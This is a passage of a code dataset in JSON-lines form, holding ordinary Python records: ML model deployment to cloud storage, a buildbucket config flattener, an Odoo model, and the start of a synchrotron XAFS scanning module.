\"wb\"))\n ohe_array = encoder.transform(categorical_features_df)\n ohe_df = pd.DataFrame(\n ohe_array,\n index=categorical_features_df.index,\n columns=encoder.get_feature_names(),\n )\n # finally, let's add the two other columns to this df to have a compelete, good-to-go df\n df_train_enc = ohe_df.join(df_train[[\"local_hour_proxy\", \"cluster\"]])\n # let's split the targets from the features\n train_y, train_x = (\n df_train_enc[\"cluster\"],\n df_train_enc.loc[:, df_train_enc.columns != \"cluster\"],\n )\n # and fit and persist the model\n clf = RandomForestClassifier(\n min_samples_split=constants.RF_MIN_SAMPLES_SPLIT,\n class_weight=\"balanced\",\n verbose=0,\n random_state=random_state,\n )\n clf.fit(train_x, train_y)\n model_name = f\"{prod_dir}/rf_classifier.sav\"\n dump(clf, open(model_name, \"wb\"))\n # finally, let's evaluate the fit\n self.evaluate_rf_fit(prod_dir, df_test, encoder, clf)\n return True\n\n def fit_random_forest(self, prod_dir, domain, lookback_period, end_date):\n # to fit a random forest classifier, we need to pass a few steps\n # 1) download training data from bigquery\n # 2) preprocess data - as a lambda (to be used in serving as well?)\n # 3) merge with predictions in prod_dir\n # 4) fit encoder and model - persist artefacts in prod_dir\n # 5) evaluate model - persist classification report in prod_dir\n # let's first instantiate the clients and get project_ids\n runtype = \"prediction\"\n downloader = cluster_model_downloader.ClusterDownloader(\n runtype, self._data_version\n )\n (\n bqclient,\n bqstorageclient,\n pulldata_project,\n permutive_project,\n ) = downloader.get_clients()\n # call the generator method\n features_df = self.download_rf_train(\n domain,\n lookback_period,\n end_date,\n bqclient,\n bqstorageclient,\n permutive_project,\n )\n # merge with the predictions, and leave only those rows where there is a cluster prediction\n pred_df = pd.read_csv(f\"{prod_dir}/fit_data_predictions.csv\", index_col=0)[\n [\"user_id\", \"cluster\"]\n ]\n train_df = pd.merge(\n features_df, pred_df, how=\"left\", left_on=[\"user_id\"], right_on=[\"user_id\"]\n )\n train_df = train_df[~train_df[\"cluster\"].isna()]\n # now we have a dataframe with the required data\n # let's preprocess\n preprocessed_df = self.preprocess_rf_data(train_df, domain)\n # now, we need to fit a one-hot encoder and transform the data accordingly\n # but first - split for train and test\n preprocessed_df = preprocessed_df.set_index(\"user_id\")\n # finally, let's fit the encoder and model\n self.fit_and_evaluate_rf_models(prod_dir, preprocessed_df)\n return True\n\n\nclass Deployer:\n # initialize the class\n def __init__(self, params, data_version, model_version):\n self._root_dir = config[\"root_dir\"]\n self._params = params\n self._data_version = data_version\n self._model_version = model_version\n\n def upload_to_storage(self, project_id, bucket_name, source_file, target_file):\n client = storage.Client(project=project_id)\n bucket = client.bucket(bucket_name)\n blob = bucket.blob(target_file)\n with open(source_file, \"rb\") as my_file:\n blob.upload_from_file(my_file)\n\n def remove_previous_deployment(self, project_id, bucket_name, domain):\n client = storage.Client(project=project_id)\n bucket = client.get_bucket(bucket_name)\n blobs = bucket.list_blobs(prefix=domain)\n for blob in blobs:\n blob.delete()\n\n def fit_rf_classifier(self, domain, best_model_dir, prod_dir):\n print(f\"Fitting random forest classifier for {domain}'s best clustering model.\")\n # if so, first, let's also move the fit predictions to the deploy folder\n fit_pred_filename_candidates = [\n item\n for item in os.listdir(best_model_dir)\n if item == \"fit_data_predictions.csv\"\n ]\n assert len(fit_pred_filename_candidates) == 1\n fit_pred_filename = fit_pred_filename_candidates[0]\n from_fit_pred = pathlib.Path(f\"{best_model_dir}/{fit_pred_filename}\")\n to_fit_pred = pathlib.Path(f\"{prod_dir}/{fit_pred_filename}\")\n shutil.copy(from_fit_pred, to_fit_pred)\n # lastly, let's extract the parameters we need for the RF fitting process\n # we already have domain, prod_dir, predictions and we need end_date and lookback_period\n end_date = re.split(\"/|\\\\\\\\\", best_model_dir.split(\"fit_for_\")[-1])[0]\n lookback_period = re.split(\"/|\\\\\\\\\", best_model_dir.split(\"lookback_\")[-1])[0]\n # let's call the method to fit a model and send artefacts to prod_dir\n classifier = Classifier(self._data_version)\n classifier.fit_random_forest(prod_dir, domain, lookback_period, end_date)\n\n def push_to_storage(self, domain, best_model_dir, prod_dir):\n print(f\"Deploying model configuration to storage for {domain} production.\")\n runtype = \"prediction\"\n downloader = cluster_model_downloader.ClusterDownloader(\n runtype, self._data_version\n )\n (\n bqclient,\n bqstorageclient,\n pulldata_project,\n permutive_project,\n ) = downloader.get_clients()\n project_id = pulldata_project\n bucket = constants.STORAGE_BUCKET\n # lets remove previous deployments from bucket\n self.remove_previous_deployment(project_id, bucket, domain)\n\n # copy all items\n for item in os.listdir(prod_dir):\n source_file = f\"{prod_dir}/{item}\"\n # we need to somehow pass to storage the lookback_period variable\n # to be used during prediction\n # let's insert that in the name of the fit_data_predictions.csv file\n if item == \"fit_data_predictions.csv\":\n lookback_period = re.split(\n \"/|\\\\\\\\\", best_model_dir.split(\"lookback_\")[-1]\n )[0]\n target_file = f\"{domain}/lookback_{lookback_period}__{item}\"\n else:\n target_file = f\"{domain}/{item}\"\n self.upload_to_storage(project_id, bucket, source_file, target_file)\n\n def move_files_to_prod(\n self,\n ):\n self._params[\"domains\"] = [\n utils.clean_domains(i) for i in self._params[\"domains\"]\n ]\n # let's go over each domain individually\n for domain in self._params[\"domains\"]:\n print(f\"Moving {domain} best model artefacts to prod dir.\")\n # within the folder for the evaluation of the models for each domain, get all 'shortlist' files - may be more than one\n # and we want to union these; do we?\n # getting the model_dir of the top model\n shortlist_metrics_dir = (\n f\"{self._root_dir}/evaluation/v_{self._model_version}/{domain}\"\n )\n shortlist_metrics_files = [\n item\n for item in os.listdir(shortlist_metrics_dir)\n if \"_shortlist_\" in item\n ]\n # let's instantiate a list to hold all the dataframes that we'll read\n shortlist_dfs_list = []\n for shortlist_file in shortlist_metrics_files:\n shortlist_df = pd.read_csv(\n f\"{shortlist_metrics_dir}/{shortlist_file}\", index_col=0\n )\n shortlist_dfs_list.append(shortlist_df)\n shortlists_df = pd.concat(shortlist_dfs_list)\n # let's sort by by 'weighted_profiling_score' ascending = False\n # TODO - move the sorting dim to constants?\n # in case there are ties, let's add the other metrics by order of importance we see\n shortlists_df.sort_values(\n [\"ranking_score\", \"cluster_variance\", \"centroid_similarity\"],\n ascending=[False, True, False],\n inplace=True,\n )\n # filter only the target models remain\n if self._params[\"target_n_clusters\"]:\n shortlists_df = shortlists_df[\n shortlists_df[\"n_clusters\"].isin(self._params[\"target_n_clusters\"])\n ]\n if self._params[\"target_lookback\"]:\n shortlists_df = shortlists_df[\n shortlists_df[\"lookback_period\"].isin(\n self._params[\"target_lookback\"]\n )\n ]\n # and now to select and move to prod the best model we want to find its dir\n best_model_dir = shortlists_df.iloc[0, :][\"model_dir\"]\n # let's now create a folder to house the model itself, along with its artefacts\n timestamp = round(time.time())\n prod_dir = f\"{self._root_dir}/deployment/v_{self._model_version}/{domain}/deployment_{timestamp}\"\n pathlib.Path(prod_dir).mkdir(parents=True, exist_ok=True)\n # now we have both the target directory and the source directory;\n # let's copy all the required artefacts, including some we'll get upper in the parameter stream\n # first, let's simply copy the three items we need from the model dir to the target dir\n # namely: the model itself (.sav), and the profiles for the fit data (_profiles_fit.csv)\n model_filename_candidates = [\n item for item in os.listdir(best_model_dir) if \"clusters.sav\" in item\n ]\n assert len(model_filename_candidates) == 1\n model_filename = model_filename_candidates[0]\n from_file_model = pathlib.Path(f\"{best_model_dir}/{model_filename}\")\n to_file_model = pathlib.Path(f\"{prod_dir}/{model_filename}\")\n shutil.copy(from_file_model, to_file_model)\n # repeat for the profile\n profile_filename_candidates = [\n item\n for item in os.listdir(best_model_dir)\n if \"_profiles_fit.csv\" in item\n ]\n\n for profile_filename in profile_filename_candidates:\n from_file_profile = pathlib.Path(f\"{best_model_dir}/{profile_filename}\")\n to_file_profile = pathlib.Path(f\"{prod_dir}/{profile_filename}\")\n shutil.copy(from_file_profile, to_file_profile)\n\n # repeat for the scaler\n scaler_path = (\n \"/\".join(re.split(\"/|\\\\\\\\\", best_model_dir.split(\"_clusters\")[0])[:-1])\n + \"/scaler.pkl\"\n )\n from_file_scaler = pathlib.Path(f\"{scaler_path}\")\n to_file_scaler = pathlib.Path(f\"{prod_dir}/scaler.pkl\")\n shutil.copy(from_file_scaler, to_file_scaler)\n # a little tricky part here - also move the 'selection_for_{hash}.csv', if the model comes from that selection\n model_selection_hash = \"/\".join(\n re.split(\"/|\\\\\\\\\", best_model_dir.split(\"_clusters\")[0])[:-1]\n ).split(\"_\")[-1]\n # now we have the hash of the feature selection that the best model has\n # let's inspect the folder above the scaler (selection folder) and get all .csv files\n # they are all the specific feature selections for downstream models\n # if our best model is one of those models, we need to copy that .csv to prod\n selection_folder = \"/\".join(\n re.split(\"/|\\\\\\\\\", best_model_dir.split(\"selected_features_\")[0])[:-1]\n )\n selection_files = [\n item\n for item in os.listdir(selection_folder)\n if \"selection_for_\" in item\n ]\n selection_files_hashes = [\n item.split(\"_\")[-1].split(\".\")[0] for item in selection_files\n ]\n if model_selection_hash in selection_files_hashes:\n from_file_selector = pathlib.Path(\n f\"{selection_folder}/selection_for_{model_selection_hash}.csv\"\n )\n to_file_selector = pathlib.Path(\n f\"{prod_dir}/selection_for_{model_selection_hash}.csv\"\n )\n shutil.copy(from_file_selector, to_file_selector)\n # finally, let's also move the last artefact - the imputer\n imputer_path = (\n \"/\".join(re.split(\"/|\\\\\\\\\", best_model_dir.split(\"outliers_\")[0])[:-1])\n + \"/imputer.pkl\"\n )\n from_file_imputer = pathlib.Path(f\"{imputer_path}\")\n to_file_imputer = pathlib.Path(f\"{prod_dir}/imputer.pkl\")\n shutil.copy(from_file_imputer, to_file_imputer)\n # finally, let's see if we want to fit a random forest classifier for the model\n if self._params[\"fit_rf_classifiers\"]:\n self.fit_rf_classifier(domain, best_model_dir, prod_dir)\n # finally, let's push the artefacts to google cloud storage\n if self._params[\"push_to_storage\"]:\n self.push_to_storage(domain, best_model_dir, prod_dir)\n","repo_name":"vamsy517/Data-Architecture","sub_path":"ingest_engine/segmentation/cluster_model/deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":21980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9702362644","text":"import sys\n\nfrom google.protobuf import text_format\nfrom infra.libs.buildbucket.proto.config import project_config_pb2\nfrom infra.libs.buildbucket.swarming import flatten_swarmingcfg\nfrom infra.libs.protoutil import multiline_proto\n\n\nUSAGE = '''Usage:\nflatten_buildbucket_cfg [INPUT_FILE]\n\nWhere INPUT_FILE is a text format buildbucket config (\nhttp://luci-config.appspot.com/schemas/projects:buildbucket.cfg)\n\nIf INPUT_FILE is \"-\" or is not specified, will read from standard in.'''\n\n\ndef _normalize_acls(acls):\n \"\"\"Normalizes a RepeatedCompositeContainer of Acl messages.\"\"\"\n for a in acls:\n if a.identity and ':' not in a.identity:\n a.identity = 'user:%s' % a.identity\n sort_key = lambda a: (a.role, a.group, a.identity)\n acls.sort(key=sort_key)\n for i in xrange(len(acls) - 1, 0, -1):\n if sort_key(acls[i]) == sort_key(acls[i - 1]):\n del acls[i]\n\n\ndef _expand_auto_builder_dimension(b):\n if (b.auto_builder_dimension == project_config_pb2.YES and\n not any(d.startswith('builder:') for d in b.dimensions)):\n b.dimensions.append('builder:%s' % b.name)\n b.auto_builder_dimension = project_config_pb2.UNSET\n\n\ndef _remove_noop_dimensions(b):\n \"\"\"Removes dimensions that look like \":\", they are noop.\"\"\"\n dims = list(b.dimensions)\n b.ClearField('dimensions')\n for d in dims:\n chunks = d.split(':')\n if len(chunks) != 2 or chunks[1]:\n b.dimensions.append(d)\n\n\ndef _move_swarming_defaults(b, swarming):\n if not b.swarming_host:\n b.swarming_host = swarming.hostname\n if (not b.HasField('task_template_canary_percentage') and\n swarming.HasField('task_template_canary_percentage')):\n b.task_template_canary_percentage.value = (\n swarming.task_template_canary_percentage.value)\n\n\ndef flatten(orig):\n pbtext = multiline_proto.parse_multiline(orig)\n project_cfg = project_config_pb2.BuildbucketCfg()\n text_format.Merge(pbtext, project_cfg)\n acl_sets_by_name = {a.name: a for a in project_cfg.acl_sets}\n builder_mixins_by_name = {m.name: m for m in project_cfg.builder_mixins}\n for bucket_cfg in project_cfg.buckets:\n # Inline ACL sets.\n for name in bucket_cfg.acl_sets:\n acl_set = acl_sets_by_name.get(name)\n if not acl_set:\n raise ValueError(\n 'referenced acl_set not found.\\n'\n 'Bucket: %r\\n'\n 'ACL set name: %r\\n', bucket_cfg.name, name\n )\n bucket_cfg.acls.extend(acl_set.acls)\n bucket_cfg.ClearField('acl_sets')\n _normalize_acls(bucket_cfg.acls)\n if bucket_cfg.HasField('swarming'):\n # Pull builder defaults out and apply default pool.\n defaults = bucket_cfg.swarming.builder_defaults\n bucket_cfg.swarming.ClearField('builder_defaults')\n if not any(d.startswith('pool:') for d in defaults.dimensions):\n defaults.dimensions.append('pool:' + bucket_cfg.name)\n for b in bucket_cfg.swarming.builders:\n flatten_swarmingcfg.flatten_builder(b, defaults, builder_mixins_by_name)\n _expand_auto_builder_dimension(b)\n _remove_noop_dimensions(b)\n _move_swarming_defaults(b, bucket_cfg.swarming)\n b.dimensions.sort()\n # These settings have been \"expanded\" by _move_swarming_defaults.\n bucket_cfg.swarming.ClearField('hostname')\n bucket_cfg.swarming.ClearField('task_template_canary_percentage')\n # Sort builders by name\n bucket_cfg.swarming.builders.sort(key=lambda x: x.name)\n # Sort top-level entries by name\n project_cfg.buckets.sort(key=lambda x: x.name)\n # Clear fields that have been expanded and are now irrelevant.\n project_cfg.ClearField('acl_sets')\n project_cfg.ClearField('builder_mixins')\n return text_format.MessageToString(project_cfg, as_utf8=True)\n\n\ndef main(argv):\n if len(argv) >= 2:\n return USAGE\n if not argv or argv[0] == '-':\n input_file = sys.stdin\n else:\n input_file = open(argv[0])\n print(flatten(input_file.read()))\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"xinghun61/infra","sub_path":"infra/tools/flatten_buildbucket_cfg/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"17899634692","text":"# -*- coding: utf-8 -*-\n\nfrom xml.etree.ElementTree import TreeBuilder\nfrom odoo import models, fields, api\n\n\nclass RankModel(models.Model):\n _name = 'touradv_ranks.rank_model'\n _description = 'touradv_ranks.rank_model'\n\n name = fields.Char(string=\"name\",help=\"Rank name\",required=True,index=True)\n game_id = fields.Many2one(\"tournament_app.game_model\",string='Game',help=\"Team\",required=True)\n leveled = fields.Integer(string=\"Leveled\",required=True)\n image = fields.Binary(string=\"Image\")\n \n\n","repo_name":"JavganJG/TournamentRanks_app","sub_path":"touradv_ranks/models/rank_model.py","file_name":"rank_model.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27237009365","text":"from bluesky.plans import scan_nd, count\nfrom bluesky.plan_stubs import sleep, mv, null\nfrom bluesky.preprocessors import subs_decorator, finalize_wrapper\n#from databroker.core import SingleRunCache\n\nimport numpy, os, re, shutil, uuid\nimport textwrap, configparser, datetime\nfrom cycler import cycler\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image\nfrom tiled.client import from_profile\n\nfrom urllib.parse import quote\n\nfrom BMM.db import file_resource\nfrom BMM.demeter import toprj\nfrom BMM.derivedplot import DerivedPlot, close_all_plots, close_last_plot\nfrom BMM.dossier import BMMDossier\nfrom BMM.functions import countdown, boxedtext, now, isfloat, inflect, e2l, etok, ktoe, present_options, plotting_mode\nfrom BMM.functions import PROMPT, DEFAULT_INI\nfrom BMM.functions import error_msg, warning_msg, go_msg, url_msg, bold_msg, verbosebold_msg, list_msg, disconnected_msg, info_msg, whisper\nfrom BMM.gdrive import copy_to_gdrive, synch_gdrive_folder, rsync_to_gdrive\nfrom BMM.kafka import kafka_message\nfrom BMM.linescans import rocking_curve\nfrom BMM.logging import BMM_log_info, BMM_msg_hook, report, img_to_slack, post_to_slack\nfrom BMM.metadata import bmm_metadata, display_XDI_metadata, metadata_at_this_moment\nfrom BMM.modes import get_mode, describe_mode\nfrom BMM.motor_status import motor_sidebar, motor_status\nfrom BMM.periodictable import edge_energy, Z_number, element_name\nfrom BMM.resting_state import resting_state_plan\nfrom BMM.suspenders import BMM_suspenders, BMM_clear_to_start, BMM_clear_suspenders\nfrom BMM.xdi import write_XDI\nfrom BMM.xafs_functions import conventional_grid, sanitize_step_scan_parameters\n\nfrom BMM import user_ns as user_ns_module\nuser_ns = vars(user_ns_module)\n\n#from __main__ import db\nfrom BMM.user_ns.base import db, startup_dir, bmm_catalog\nfrom BMM.user_ns.dwelltime import _locked_dwell_time, use_4element, use_1element\nfrom BMM.user_ns.detectors import quadem1, vor, xs, xs1, ic0\n\ntry:\n from bluesky_queueserver import is_re_worker_active\nexcept ImportError:\n # TODO: delete this when 'bluesky_queueserver' is distributed as part of collection environment\n def is_re_worker_active():\n return False\n\n\n\n# p = scan_metadata(inifile='/home/bravel/commissioning/scan.ini', filename='humbleblat.flarg', start=10)\n# (energy_grid, time_grid, approx_time) = conventional_grid(p['bounds'],p['steps'],p['times'],e0=p['e0'])\n# then call bmm_metadata() to get metadata in an XDI-ready format\n\n\n\ndef next_index(folder, stub):\n '''Find the next numeric filename extension for a filename stub in folder.'''\n listing = os.listdir(folder)\n r = re.compile(re.escape(stub) + '\\.\\d+')\n results = sorted(list(filter(r.match, listing)))\n if len(results) == 0:\n return 1\n return int(results[-1][-3:]) + 1\n\n## need more error checking:\n## * k^2 times\n## * switch back to energy units after a k-valued boundary?\n## * pre-edge k-values steps & times\n\n\n \n\n\ndef scan_metadata(inifile=None, **kwargs):\n \"\"\"Typical use is to specify an INI file, which contains all the\n metadata relevant to a set of scans. This function is called with\n one argument:\n\n parameters = scan_metadata(inifile='/path/to/inifile')\n\n inifile: fully resolved path to INI file describing the measurement.\n\n A dictionary of metadata is returned.\n\n As part of a multi-scan plan (i.e. a macro), individual metadata\n can be specified as kwargs to override values in the INI file.\n The kwarg keys are the same as the keys in the dictionary which is\n returned:\n\n Parameters\n ----------\n folder : str\n folder for saved XDI files\n filename : str\n filename stub for saved XDI files\n experimenters [str] \n names of people involved in this measurements\n e0 : float\n edge energy, reference value for energy grid\n element : str\n one- or two-letter element symbol\n edge : str\n K, L3, L2, or L1\n sample : str\n description of sample, perhaps stoichiometry\n prep : str\n a short statement about sample preparation\n comment : str\n user-supplied comment about the data\n nscan : int\n number of repetitions\n start : int\n starting scan number, XDI file will be filename.###\n snapshots : bool\n True = capture analog and XAS cameras before scan sequence\n usbstick : bool\n True = munge filenames so they can be written to a VFAT USB stick\n rockingcurve [bool] \n True = measure rocking curve at pseudo channel cut energy\n lims : bool\n False = force both htmlpage and snapshot to be false\n htmlpage : bool\n True = capture dossier of a scan sequence as a static html page\n bothways : bool\n True = measure in both monochromator directions\n channelcut : bool\n True = measure in pseudo-channel-cut mode\n ththth : bool\n True = measure using the Si(333) reflection\n mode : str\n transmission, fluorescence, or reference -- how to display the data\n bounds : list\n scan grid boundaries (not kwarg-able at this time)\n steps : list\n scan grid step sizes (not kwarg-able at this time)\n times : list\n scan grid dwell times (not kwarg-able at this time)\n\n Any or all of these can be specified. Values from the INI file\n are read first, then overridden with specified values. If values\n are specified neither in the INI file nor in the function call,\n (possibly) sensible defaults are used.\n\n \"\"\"\n #frame = inspect.currentframe() # see https://stackoverflow.com/a/582206 and\n #args = inspect.getargvalues(frame)[3] # https://docs.python.org/3/library/inspect.html#inspect.getargvalues\n\n BMMuser, dcm = user_ns['BMMuser'], user_ns['dcm']\n parameters = dict()\n\n if inifile is None:\n print(error_msg('\\nNo inifile specified\\n'))\n return {}, {}\n if not os.path.isfile(inifile):\n print(error_msg('\\ninifile does not exist\\n'))\n return {}, {}\n\n config = configparser.ConfigParser(interpolation=None)\n config.read_file(open(inifile))\n\n found = dict()\n\n ## ----- scan regions (what about kwargs???)\n for a in ('bounds', 'steps', 'times'):\n found[a] = False\n parameters[a] = []\n if a not in kwargs:\n try:\n #for f in config.get('scan', a).split():\n for f in re.split('[ \\t,]+', config.get('scan', a).strip()):\n try:\n parameters[a].append(float(f))\n except:\n parameters[a].append(f)\n found[a] = True\n except:\n parameters[a] = getattr(BMMuser, a)\n else:\n this = str(kwargs[a])\n for f in this.split():\n try:\n parameters[a].append(float(f))\n except:\n parameters[a].append(f)\n found[a] = True\n parameters['bounds_given'] = parameters['bounds'].copy()\n\n (problem, text, reference) = sanitize_step_scan_parameters(parameters['bounds'], parameters['steps'], parameters['times'])\n if len(text) > 1:\n print(text)\n print(f'\\nsee: {reference}')\n if problem:\n return {}, {}\n\n ## ----- strings\n for a in ('folder', 'experimenters', 'element', 'edge', 'filename', 'comment',\n 'mode', 'sample', 'prep', 'url', 'doi', 'cif'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = config.get('scan', a)\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = str(kwargs[a])\n found[a] = True\n\n if not os.path.isdir(parameters['folder']):\n print(error_msg('\\nfolder %s does not exist\\n' % parameters['folder']))\n return {}, {}\n parameters['mode'] = parameters['mode'].lower()\n \n ## ----- start value\n if 'start' not in kwargs:\n try:\n parameters['start'] = str(config.get('scan', 'start'))\n found['start'] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters['start'] = str(kwargs['start'])\n found['start'] = True\n try:\n if parameters['start'] == 'next':\n parameters['start'] = next_index(parameters['folder'],parameters['filename'])\n else:\n parameters['start'] = int(parameters['start'])\n except ValueError:\n print(error_msg('\\nstart value must be a positive integer or \"next\"'))\n parameters['start'] = -1\n found['start'] = False\n\n ## ----- integers\n for a in ('nscans', 'npoints'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = int(config.get('scan', a))\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = int(kwargs[a])\n found[a] = True\n\n ## ----- floats\n for a in ('e0', 'energy', 'inttime', 'dwell', 'delay'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = float(config.get('scan', a))\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = float(kwargs[a])\n found[a] = True\n\n ## ----- booleans\n for a in ('snapshots', 'htmlpage', 'lims', 'bothways', 'channelcut', 'usbstick', 'rockingcurve', 'ththth', 'shutter'):\n found[a] = False\n if a not in kwargs:\n try:\n parameters[a] = config.getboolean('scan', a)\n found[a] = True\n except configparser.NoOptionError:\n parameters[a] = getattr(BMMuser, a)\n else:\n parameters[a] = bool(kwargs[a])\n found[a] = True\n if parameters['lims'] is False:\n parameters['htmlpage'] = False\n parameters['snapshots'] = False\n \n if dcm._crystal != '111' and parameters['ththth']:\n print(error_msg('\\nYou must be using the Si(111) crystal to make a Si(333) measurement\\n'))\n return {}, {}\n\n if not found['e0'] and found['element'] and found['edge']:\n parameters['e0'] = edge_energy(parameters['element'], parameters['edge'])\n if parameters['e0'] is None:\n print(error_msg('\\nCannot figure out edge energy from element = %s and edge = %s\\n' % (parameters['element'], parameters['edge'])))\n return {}, {}\n else:\n found['e0'] = True\n #print('\\nUsing tabulated value of %.1f for the %s %s edge\\n' % (parameters['e0'], parameters['element'], parameters['edge']))\n if parameters['e0'] > 23500:\n print(error_msg('\\nThe %s %s edge is at %.1f, which is ABOVE the measurement range for BMM\\n' %\n (parameters['element'], parameters['edge'], parameters['e0'])))\n return {}, {}\n if parameters['e0'] < 4000:\n print(error_msg('\\nThe %s %s edge is at %.1f, which is BELOW the measurement range for BMM\\n' %\n (parameters['element'], parameters['edge'], parameters['e0'])))\n return {}, {}\n\n \n return parameters, found\n\n\n\ndef channelcut_energy(e0, bounds, ththth):\n '''From the scan parameters, find the energy at the center of the angular range of the scan.\n If the center of the angular range is too close to (or below) e0, use 50 eV above e0.\n '''\n dcm = user_ns['dcm']\n for i,s in enumerate(bounds):\n if type(s) is str:\n this = float(s[:-1])\n bounds[i] = ktoe(this)\n amin = dcm.e2a(e0+bounds[0])\n amax = dcm.e2a(e0+bounds[-1])\n if ththth:\n amin = dcm.e2a((e0+bounds[0])/3.0)\n amax = dcm.e2a((e0+bounds[-1])/3.0)\n aave = amin + 1.0*(amax - amin) / 2.0\n wavelength = dcm.wavelength(aave)\n eave = e2l(wavelength)\n if eave < e0 + 30:\n eave = e0 + 50\n return eave\n\n\ndef attain_energy_position(value):\n '''Attempt to move to an energy position, attempting to deal\n gracefully with encoder loss on the Bragg axis.\n\n Argument\n ========\n value : (float) target energy value\n\n Returns True for success, False for failure\n '''\n dcm, dcm_bragg = user_ns['dcm'], user_ns['dcm_bragg']\n BMMuser = user_ns['BMMuser']\n dcm_bragg.clear_encoder_loss()\n yield from mv(dcm.energy, value)\n count = 0\n while abs(dcm.energy.position - value) > 0.1 :\n if count > 4:\n print(error_msg('Unresolved encoder loss on Bragg axis. Stopping XAFS scan.'))\n BMMuser.final_log_entry = False\n yield from null()\n return False\n print('Clearing encoder loss and re-trying movement to pseudo-channel-cut energy...')\n dcm_bragg.clear_encoder_loss()\n yield from sleep(2)\n yield from mv(dcm.energy, value)\n count = count + 1\n return True\n\n\ndef ini_sanity(found):\n '''Very simple sanity checking of the scan control file.'''\n ok = True\n missing = []\n for a in ('bounds', 'steps', 'times', 'e0', 'element', 'edge', 'filename', 'nscans', 'start'):\n if found[a] is False:\n ok = False\n missing.append(a)\n return (ok, missing)\n\n\n\n##########################################################\n# --- export a database energy scan entry to an XDI file #\n##########################################################\ndef db2xdi(datafile, key):\n '''\n Export a database entry for an XAFS scan to an XDI file.\n\n Parameters\n ----------\n datafile : str\n output file name\n key : str\n UID in database\n\n\n Examples\n --------\n\n >>> db2xdi('/path/to/myfile.xdi', 1533)\n\n >>> db2xdi('/path/to/myfile.xdi', '0783ac3a-658b-44b0-bba5-ed4e0c4e7216')\n\n '''\n BMMuser = user_ns['BMMuser']\n dfile = datafile\n if BMMuser.DATA not in dfile:\n if 'bucket' not in BMMuser.DATA:\n dfile = os.path.join(BMMuser.DATA, datafile)\n if os.path.isfile(dfile):\n print(error_msg('%s already exists! Bailing out....' % dfile))\n return\n header = db[key]\n ## sanity check, make sure that db returned a header AND that the header was an xafs scan\n write_XDI(dfile, header)\n print(bold_msg('wrote %s' % dfile))\n\n\n\n#########################\n# -- the main XAFS scan #\n#########################\ndef xafs(inifile=None, **kwargs):\n '''\n Read an INI file for scan matadata, then perform an XAFS scan sequence.\n '''\n def main_plan(inifile, **kwargs):\n if '311' in dcm._crystal and dcm_x.user_readback.get() < 10:\n BMMuser.final_log_entry = False\n print(error_msg('The DCM is in the 111 position, configured as 311'))\n print(error_msg('\\tdcm.x: %.2f mm\\t dcm._crystal: %s' % (dcm_x.user_readback.get(), dcm._crystal)))\n yield from null()\n return\n if '111' in dcm._crystal and dcm_x.user_readback.get() > 10:\n BMMuser.final_log_entry = False\n print(error_msg('The DCM is in the 311 position, configured as 111'))\n print(error_msg('\\tdcm_x: %.2f mm\\t dcm._crystal: %s' % (dcm_x.user_readback.get(), dcm._crystal)))\n yield from null()\n return\n\n \n verbose = False\n if 'verbose' in kwargs and kwargs['verbose'] is True:\n verbose = True\n \n supplied_metadata = dict()\n if 'md' in kwargs and type(kwargs['md']) == dict:\n supplied_metadata = kwargs['md']\n #if 'purpose' not in supplied_metadata:\n # this_purpose = purpose('xafs', 'scan_nd', )\n # supplied_metadata['purpose'] = 'xafs'\n\n if is_re_worker_active():\n BMMuser.prompt = False\n kwargs['force'] = True\n\n if verbose: print(verbosebold_msg('checking clear to start (unless force=True)')) \n if 'force' in kwargs and kwargs['force'] is True:\n (ok, text) = (True, '')\n else:\n (ok, text) = BMM_clear_to_start()\n if ok is False:\n BMMuser.final_log_entry = False\n print(error_msg('\\n'+text))\n print(bold_msg('Quitting scan sequence....\\n'))\n yield from null()\n return\n\n ## make sure we are ready to scan\n #yield from mv(_locked_dwell_time.quadem_dwell_time.settle_time, 0)\n #yield from mv(_locked_dwell_time.struck_dwell_time.settle_time, 0)\n _locked_dwell_time.quadem_dwell_time.settle_time = 0\n #_locked_dwell_time.struck_dwell_time.settle_time = 0\n\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user input, find and parse the INI file\n if verbose: print(verbosebold_msg('time estimate')) \n inifile, estimate = howlong(inifile, interactive=False, **kwargs)\n if estimate == -1:\n BMMuser.final_log_entry = False\n yield from null()\n return\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n p['channelcut'] = True\n if p['lims'] is False:\n BMMuser.lims = False\n else:\n BMMuser.lims = True\n if not any(p): # scan_metadata returned having printed an error message\n return(yield from null())\n\n \n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## if in xs mode, make sure we are configured correctly\n if plotting_mode(p['mode']) == 'xs' and use_4element is True:\n if (any(getattr(BMMuser, x) is None for x in ('element', 'xs1', 'xs2', 'xs3', 'xs4',\n 'xschannel1', 'xschannel2', 'xschannel3', 'xschannel4'))):\n print(error_msg('BMMuser is not configured to measure correctly with the Xspress3 and the 4-element detector'))\n print(error_msg('Likely solution:'))\n print(error_msg('Set element symbol: BMMuser.element = Fe # (or whatever...)'))\n print(error_msg('then do: xs.measure_roi()'))\n return(yield from null())\n if plotting_mode(p['mode']) == 'xs1' and use_1element is True:\n if (any(getattr(BMMuser, x) is None for x in ('element', 'xs8', 'xschannel8'))):\n print(error_msg('BMMuser is not configured to measure correctly with the Xspress3 and the 1-element detector'))\n print(error_msg('Likely solution:'))\n print(error_msg('Set element symbol: BMMuser.element = Fe # 